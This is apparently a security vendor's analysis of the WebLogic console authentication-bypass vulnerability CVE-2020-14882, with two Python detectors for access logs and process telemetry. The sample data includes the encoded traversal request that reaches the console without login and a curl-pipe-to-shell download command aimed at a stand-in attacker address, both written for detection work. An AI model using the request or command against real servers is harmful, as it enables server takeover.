CVE-2020-14882 WebLogic RCE Via GET Request
Virsec Security Research Lab Vulnerability Analysis
The Virsec Security Research Lab provides detailed analysis on recent and notable security vulnerabilities.
Oracle's advisory describes a vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console) that is easily exploitable: an unauthenticated attacker with HTTP network access can compromise the server, and a successful attack results in takeover of Oracle WebLogic Server. In practice the flaw is an authentication bypass in the administration console: a single crafted GET request whose path carries an encoded directory traversal reaches console pages without a login and, chained with the related console issue CVE-2020-14883, lets the attacker run operating-system commands in the context of the WebLogic server process.
The CVSS v3.1 base score is 9.8 (Critical), vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
Affected Oracle WebLogic Server versions (per Oracle's October 2020 Critical Patch Update): 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
This was disclosed by security researcher Voidfyoo from Chaitin Security Research Lab.
A public exploit exists for this vulnerability. Oracle WebLogic Server is a Java EE application server developed by Oracle Corporation; Oracle acquired it when it purchased BEA Systems in 2008.
Exploitation can expose all sensitive data residing on the server: the commands the attacker runs can install a backdoor that exfiltrates data to a command-and-control (C2) server.
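Because the exploit is a single unauthenticated GET request, web-server or WebLogic access logs are the cheapest place to spot it. The following detector is an added example written for this page, not Virsec's code or any WebLogic component: it decodes each request path repeatedly (the public exploit double-URL-encodes the traversal so that the console's own check does not see it), and flags requests that start under a static, login-free console prefix and traverse back up with a `..` segment. The log lines are constructed for the example and mirror the shape of the publicly known request; the set of static prefixes is an assumption and should be tuned to the deployment.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format). Invented for this
# example; the two 203.0.113.9 lines mirror the publicly known request shape
# used to reach console.portal without a login.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Oct/2020:10:01:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3120
10.0.0.5 - - [28/Oct/2020:10:01:09 +0000] "GET /console/console.portal?_nfpb=true HTTP/1.1" 302 0
203.0.113.9 - - [28/Oct/2020:10:02:44 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 24815
203.0.113.9 - - [28/Oct/2020:10:02:45 +0000] "GET /console/images/%252E%252E/console.portal HTTP/1.1" 200 24815
10.0.0.7 - - [28/Oct/2020:10:03:00 +0000] "GET /app/index.jsp HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed static console resource prefixes that are served without a login.
# A traversal from under one of these back into the console is the tell-tale.
STATIC_PREFIXES = ("/console/css/", "/console/images/", "/console/framework/")


def normalize_path(target):
    """Strip the query string and URL-decode until the value stops changing,
    so %252e%252e (double encoded), %2e%2e (single) and .. compare equal.
    The loop is bounded so pathological inputs cannot spin it."""
    path = target.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.lower()


def is_console_traversal(target):
    """True when the request starts under a login-free console prefix and
    contains a '..' path segment after full decoding."""
    path = normalize_path(target)
    if not path.startswith(STATIC_PREFIXES):
        return False
    return ".." in path.split("/")


def find_console_traversals(log_text):
    """Return (client ip, status, raw target) for every matching request.
    A 200 on such a request means a console page was served without a login."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_console_traversal(m.group("target")):
            hits.append((m.group("ip"), int(m.group("status")), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, status, target in find_console_traversals(SAMPLE_LOG):
        print(f"{ip} status={status} {target}")
```

Decoding until the value is stable is the important part: matching the literal string `%252e` would miss a single-encoded or mixed-case variant, while decoding once would miss the double-encoded form the public exploit uses.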
Virsec Security Platform (VSP) Support
The Virsec Security Platform (VSP)-Host monitors spawned processes and compares them against an allowlist of expected processes. Any attempt by the WebLogic server process to execute a new command or an unknown binary is denied by VSP-Host's Process Monitoring capability.
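The same allowlist idea can be reproduced as detection logic over process-creation telemetry. The script below is an added example, not VSP code: it walks parent-process links to find every process descended from the WebLogic server (`weblogic.Server` on the Java command line), allows only binaries on an allowlist, and for shells additionally requires the full command line to match an approved pattern, since the exploit's payload is typically `java.lang.Runtime.exec` launching `/bin/sh -c ...`. The events, the allowlist and the shell patterns are constructed for this example.

```python
import re

# Constructed process-creation events in the shape of auditd/EDR telemetry
# (invented for this example, not real data). pid 4100 is the AdminServer JVM.
EVENTS = [
    {"pid": 4100, "ppid": 1,    "exe": "/usr/lib/jvm/jdk8/bin/java",
     "cmdline": "java -Dweblogic.Name=AdminServer weblogic.Server"},
    {"pid": 4188, "ppid": 4100, "exe": "/bin/sh",
     "cmdline": "/bin/sh -c /opt/app/bin/rotate-logs.sh"},
    {"pid": 5203, "ppid": 4100, "exe": "/bin/sh",
     "cmdline": "/bin/sh -c curl http://203.0.113.9/x.sh | sh"},
    {"pid": 5204, "ppid": 5203, "exe": "/usr/bin/curl",
     "cmdline": "curl http://203.0.113.9/x.sh"},
    {"pid": 5210, "ppid": 4100, "exe": "/bin/bash",
     "cmdline": "bash -i"},
    {"pid": 6001, "ppid": 1,    "exe": "/usr/bin/curl",
     "cmdline": "curl https://updates.example.internal/"},
]

# Hypothetical policy: binaries the server is expected to launch, and for
# shells the exact command lines permitted. Everything else under the server
# is denied. Tune both to the deployment.
ALLOWED_EXES = {"/opt/app/bin/rotate-logs.sh"}
ALLOWED_SHELL_CMDLINES = [re.compile(r"^/bin/sh -c /opt/app/bin/[\w.-]+\.sh$")]
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/sh", "/usr/bin/bash"}


def is_server_process(ev):
    return "weblogic.Server" in ev["cmdline"]


def descends_from_server(ev, by_pid):
    """Walk ppid links until the WebLogic server process or the tree root is
    reached; the seen-set guards against cyclic or reused pids."""
    seen = set()
    cur = ev
    while cur["ppid"] in by_pid and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        cur = by_pid[cur["ppid"]]
        if is_server_process(cur):
            return True
    return False


def decide(ev, by_pid):
    """Return ('allow' | 'deny', reason) for one process-creation event."""
    if is_server_process(ev) or not descends_from_server(ev, by_pid):
        return "allow", "not spawned under the WebLogic server"
    if ev["exe"] in SHELLS:
        if any(p.match(ev["cmdline"]) for p in ALLOWED_SHELL_CMDLINES):
            return "allow", "shell command line on allowlist"
        return "deny", "shell spawned by server with non-allowlisted command line"
    if ev["exe"] in ALLOWED_EXES:
        return "allow", "binary on allowlist"
    return "deny", "unknown binary spawned under the WebLogic server"


def evaluate(events):
    """Map each pid to its decision; evaluates the whole recorded tree."""
    by_pid = {e["pid"]: e for e in events}
    return {e["pid"]: decide(e, by_pid) for e in events}


if __name__ == "__main__":
    for pid, (verdict, reason) in evaluate(EVENTS).items():
        print(f"pid {pid}: {verdict} ({reason})")
```

Checking ancestry rather than only the immediate parent matters: the `curl` in the example is two levels below the JVM, and an exploit that first spawns a shell would otherwise hide every later child behind an allowed-looking parent. Allowlisting a shell binary on its own is pointless; the command line is what distinguishes a log-rotation job from a download-and-execute payload.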
Download the full vulnerability report to learn more about this and other important vulnerabilities.